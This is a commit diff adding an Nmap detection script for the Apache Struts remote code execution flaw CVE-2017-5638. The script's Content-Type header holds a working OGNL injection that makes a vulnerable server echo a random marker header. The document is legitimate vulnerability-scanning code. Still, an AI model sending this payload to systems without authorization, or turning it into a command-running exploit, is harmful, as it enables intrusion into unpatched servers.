summaryrefslogtreecommitdiffstats
path: root/scripts/http-vuln-cve2017-5638.nse
diff options
context:
space:
mode:
Diffstat (limited to 'scripts/http-vuln-cve2017-5638.nse')
-rw-r--r--scripts/http-vuln-cve2017-5638.nse78
1 files changed, 78 insertions, 0 deletions
diff --git a/scripts/http-vuln-cve2017-5638.nse b/scripts/http-vuln-cve2017-5638.nse
new file mode 100644
index 0000000..60c3d3b
--- /dev/null
+++ b/scripts/http-vuln-cve2017-5638.nse
@@ -0,0 +1,78 @@
+description = [[
+Detects whether the specified URL is vulnerable to the Apache Struts
+Remote Code Execution Vulnerability (CVE-2017-5638).
+]]
+
+local http = require "http"
+local shortport = require "shortport"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+local string = require "string"
+local rand = require "rand"
+
+---
+-- @usage
+-- nmap -p <port> --script http-vuln-cve2017-5638 <target>
+--
+-- @output
+-- PORT STATE SERVICE
+-- 80/tcp open http
+-- | http-vuln-cve2017-5638:
+-- | VULNERABLE
+-- | Apache Struts Remote Code Execution Vulnerability
+-- | State: VULNERABLE
+-- | IDs: CVE:CVE-2017-5638
+-- |
+-- | Disclosure date: 2017-03-07
+-- | References:
+-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
+-- | https://cwiki.apache.org/confluence/display/WW/S2-045
+-- |_ http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
+--
+-- @args http-vuln-cve2017-5638.method The HTTP method for the request. The default method is "GET".
+-- @args http-vuln-cve2017-5638.path The URL path to request. The default path is "/".
+
+author = "Seth Jackson"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = { "vuln" }
+
+portrule = shortport.http
+
+action = function(host, port)
+ local vuln = {
+ title = "Apache Struts Remote Code Execution Vulnerability",
+ state = vulns.STATE.NOT_VULN,
+ description = [[
+Apache Struts 2.3.5 - Struts 2.3.31 and Apache Struts 2.5 - Struts 2.5.10 are vulnerable to a Remote Code Execution
+vulnerability via the Content-Type header.
+ ]],
+ IDS = {
+ CVE = "CVE-2017-5638"
+ },
+ references = {
+ 'https://cwiki.apache.org/confluence/display/WW/S2-045',
+ 'http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html'
+ },
+ dates = {
+ disclosure = { year = '2017', month = '03', day = '07' }
+ }
+ }
+
+ local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+
+ local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "GET"
+ local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/"
+ local value = rand.random_alpha(8)
+
+ local header = {
+ ["Content-Type"] = string.format("%%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Check-Struts', '%s')}.multipart/form-data", value)
+ }
+
+ local response = http.generic_request(host, port, method, path, { header = header })
+
+ if response and response.status == 200 and response.header["x-check-struts"] == value then
+ vuln.state = vulns.STATE.VULN
+ end
+
+ return vuln_report:make_output(vuln)
+end